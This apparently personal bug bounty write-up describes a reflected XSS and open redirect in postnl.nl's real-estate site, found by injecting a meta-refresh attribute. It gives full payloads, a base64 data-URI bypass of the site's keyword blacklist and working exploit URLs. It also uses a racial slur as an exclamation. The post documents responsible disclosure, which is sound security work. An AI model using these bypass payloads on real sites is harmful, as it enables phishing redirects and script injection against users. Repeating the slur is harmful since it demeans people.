XSS bypass using META tag in realestate.postnl.nl

Hi readers ,

Today I will write about a XSS Vulnerability I reported to postnl.nl bug bounty Program .

Vulnerable Endpoint :- http://realestate.postnl.nl/?Lang=

To test a normal Reflected XSS I Input “><xsstest> in the Lang parameter and in source it was reflected properly inside META tag like below :-

<meta name="language" content=""><xsstest>" />

Looks simple right ? Then wait a little :’) . Then I Inputted “><img src=x> and I got :-

Surprise you nigga 🥳🥳🥳

I tried with many HTML tags and I got 2 points here :-

  • Any Valid HTML tag is not allowed .
  • I can created any attributes here .

So I googled for meta tag attributes and got :-

looks interesting 🤔🤔🤔

The http-equiv attribute took my attention . Now I again google more about it and learned that :-

META tag has the http-equiv directive. This directive allows you to define the equivalent of an HTTP header in the HTML code . The http-equiv directive can take a value of refresh , which can be used to redirect a user to another page.

Then I input 0;http://evil.com"HTTP-EQUIV="refresh" and response was :-

<meta name="language" content="0;http://evil.com"HTTP-EQUIV="refresh"" />

And I got redirected to evil.com . So I have open redirection now . Now we can try for Data URI XSS . So I input :- 0;javascript:alert(1)"HTTP-EQUIV="refresh" and response was :-

This was again Triaged for the keyword javascript used in payload . So I used Base64 encoded payload :- 0;data:text/html;base64,PHNjcmlwdD5wcm9tcHQoIlJlZmxlY3RlZCBYU1MgQnkgUHJpYWwiKTwvc2NyaXB0Pg=="HTTP-EQUIV="refresh" and response source was :-

<meta name="language" content="0;data:text/html;base64,PHNjcmlwdD5wcm9tcHQoIlJlZmxlY3RlZCBYU1MgQnkgUHJpYWwiKTwvc2NyaXB0Pg=="HTTP-EQUIV="refresh"" />

And now when I visit http://realestate.postnl.nl/?Lang=0%3Bdata%3Atext%2fhtml%3Bbase64%2CPHNjcmlwdD5wcm9tcHQoIlJlZmxlY3RlZCBYU1MgQnkgUHJpYWwiKTwvc2NyaXB0Pg%3D%3D%22HTTP-EQUIV%3D%22refresh%22 I got XSS popup .

I reported it to their Zerocopter report form . Then they deployed a Fix by blacklisting the data:text/html;base64 keyword like they have blacklisted JavaScript keyword but still I can do Open Redirect when a user visits :- http://realestate.postnl.nl/?Lang=0%3Bhttp%3A%2f%2fevil.com%22HTTP-EQUIV%3D%22refresh%22

Looks cool 🙄🙄🙄

They again Fixed the issue and listed My name on their Hall Of Fame page & also offered to send some goodies 😍😍😍 .


Thanks for reading .

Follow me on twitter

If you have any query ask me on Facebook